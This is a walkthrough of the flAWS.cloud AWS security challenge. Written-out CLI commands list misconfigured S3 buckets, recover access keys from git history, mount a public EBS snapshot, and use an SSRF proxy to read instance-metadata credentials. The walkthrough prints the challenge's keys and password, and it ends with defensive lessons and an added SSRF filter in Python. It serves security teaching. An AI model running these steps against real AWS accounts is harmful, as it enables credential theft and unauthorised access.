flAWS.cloud Walkthrough: AWS S3, IAM, EC2, and Lambda Exploitation

flAWS.cloud Walkthrough – Exploiting AWS Misconfigurations
flAWS.cloud is a hands-on CTF-style challenge created to teach cloud security professionals about real-world AWS misconfigurations and their potential exploitation. This walkthrough explains each step in detail, covering how attackers can enumerate, exploit, and escalate privileges inside AWS environments.
Pre-requisites
- AWS Account – Free tier is enough.
- AWS CLI – Install and configure with an IAM user (never use root).
- IAM User – With policies to create/manage S3, EC2, and IAM.
- Git – Required to fetch repos and explore leaked commits.
Notes
- The challenge is hosted in us-west-2.
- Some tasks require a Linux environment.
- Always cross-check AWS docs for S3, IAM, EC2, Lambda.
- Make sure EBS volumes and EC2 instances are in the same region when mounting snapshots.
- Contact me if you get stuck—I’d be happy to help!
Task 1 – Public S3 Bucket Enumeration
Without any credentials, we attempt to list the bucket:
aws s3 ls s3://flaws.cloud --no-sign-request
- Discovered secret-dd02c7c.html at:
http://flaws.cloud.s3.amazonaws.com/secret-dd02c7c.html
Security Issue:
- Public S3 bucket listing should never be enabled.
- Exposes internal files to unauthenticated users.
Task 2 – Authenticated S3 Enumeration
- The bucket grants list access to the “All Authenticated AWS Users” group, so a user authenticated to any AWS account can enumerate it:
aws s3 --profile default ls s3://level2-xxxx.flaws.cloud/
- Discovered secret-e4443fc.html → leads to Task 3.
Security Issue:
- Misconfigured ACL allows any AWS account to list objects.
Task 3 – Secrets in Git Repository on S3
- We found a .git folder inside the bucket:
aws s3 sync s3://level3-xxxx.flaws.cloud/ .
git log
git checkout <commit-id>
- Found AWS Access Keys inside access_key.txt:
access_key_id: AKIAJ366LIPB4IJKT7SA
secret_access_key: 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
- Configured AWS CLI with the leaked creds:
aws configure --profile flaws
aws --profile flaws s3api list-buckets
Security Issue:
- Never commit AWS keys to Git repos.
- If leaked, revoke immediately and rotate.
Task 4 – Exploiting Public EC2 Snapshots
- Discovered an EC2 snapshot linked to IAM user backup:
aws --profile flaws ec2 describe-snapshots --owner-id 975426262029
- Imported the snapshot into our account:
aws ec2 create-volume \
--availability-zone us-west-2a \
--region us-west-2 \
--snapshot-id snap-0b49342abd1bdcb89
- Mounted snapshot → found setupNginx.sh with plaintext creds:
username: flaws
password: nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M
- Logged into the hosted website successfully.
Security Issue:
- EC2 snapshots should always be private.
- Public snapshots expose sensitive data & credentials.
Task 5 – Exploiting EC2 Metadata via SSRF
- The instance was exposing AWS Instance Metadata Service (IMDS) through /proxy:
http://<ec2-public-dns>/proxy/169.254.169.254/latest/meta-data
- Extracted temporary IAM role credentials:
iam/security-credentials/flaws
- Exported them and accessed:
aws s3 ls s3://level6-xxxx.flaws.cloud
Security Issue:
- A proxy that can reach IMDS is an SSRF vector → theft of the instance role's temporary credentials.
- Applications should block access to 169.254.169.254.
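One way to apply the "block access to 169.254.169.254" advice inside a /proxy-style endpoint, as an added example (not code from flAWS.cloud or from this walkthrough). The function names, the injectable resolver, and the example.test hostnames with their DNS answers are assumptions constructed for the illustration.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

def to_ip(host):
    """Parse a literal address, including legacy IPv4 spellings; None if not a literal."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        try:
            # inet_aton accepts the decimal/hex/octal forms many HTTP clients also accept
            ip = ipaddress.IPv4Address(socket.inet_aton(host))
        except (OSError, ValueError):
            return None
    # Unwrap ::ffff:a.b.c.d so the IPv4 range checks apply to it
    return getattr(ip, "ipv4_mapped", None) or ip

def is_internal(ip):
    """True for link-local (IMDS), loopback, private and other non-public ranges."""
    return (ip.is_link_local or ip.is_loopback or ip.is_private
            or ip.is_unspecified or ip.is_reserved or ip.is_multicast)

def proxy_target_allowed(target, resolve=socket.getaddrinfo):
    """target is the text after /proxy/, e.g. 'host/path'. Fails closed on any doubt."""
    try:
        host = urlsplit("//" + target).hostname
    except ValueError:
        return False
    if not host:
        return False
    literal = to_ip(host)
    if literal is not None:
        addrs = [literal]
    else:
        try:
            addrs = [to_ip(info[4][0]) for info in resolve(host, None)]
        except OSError:
            return False
    # Every resolved address must be public; one internal record is enough to refuse
    return bool(addrs) and all(a is not None and not is_internal(a) for a in addrs)

def fake_resolve(host, port):
    """Constructed resolver for the demo: hostnames and answers are made up."""
    table = {"www.example.test": ["93.184.216.34"],
             "imds.example.test": ["93.184.216.34", "169.254.169.254"]}
    if host not in table:
        raise socket.gaierror("unknown host")
    return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", (ip, 0)) for ip in table[host]]
```

A real proxy must then connect to the address that was validated instead of resolving the name a second time, otherwise a DNS answer that changes between the check and the fetch defeats the filter.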
Task 6 – Lambda Privilege Escalation via API Gateway
- Checked IAM role & attached policies:
aws --profile sec iam list-attached-role-policies --role-name level6
aws --profile sec lambda list-functions
- Found Lambda function Level6 and API Gateway ID s33ppypa75:
aws --profile sec apigateway get-stages --rest-api-id s33ppypa75
Stage: prod
- Invoked Lambda via API Gateway:
https://s33ppypa75.execute-api.us-west-2.amazonaws.com/prod/Level6
- Response revealed the final endpoint:
http://theend-xxxx.flaws.cloud/d730aa2b/
Challenge Completed 🎉
Security Issue:
- Over-permissive IAM policies + API Gateway integration can be abused to invoke internal Lambda functions.
- Always enforce least privilege & review IAM policies.
Key Security Lessons
- S3 Misconfiguration → Public listing exposes sensitive files.
- Git Repo Secrets → Never commit credentials.
- Public Snapshots → EC2/EBS volumes can leak private data.
- IMDS Exposure → Protect against SSRF attacks.
- IAM Over-Permissions → Leads to privilege escalation.
- API Gateway + Lambda → Can be exploited if policies are too permissive.
Conclusion
The flAWS.cloud CTF is a perfect way to understand real-world AWS security pitfalls. It highlights how a single misconfiguration (like public S3 or IMDS exposure) can cascade into full account compromise.
Best Practices to Prevent Such Exploits:
- Enforce least privilege IAM policies.
- Disable public S3 access by default.
- Regularly audit IAM, S3, EC2, Lambda configurations.
- Use tools like AWS Config, Security Hub, ScoutSuite.
- Implement automated secret scanning for repos (e.g., GitLeaks, TruffleHog).


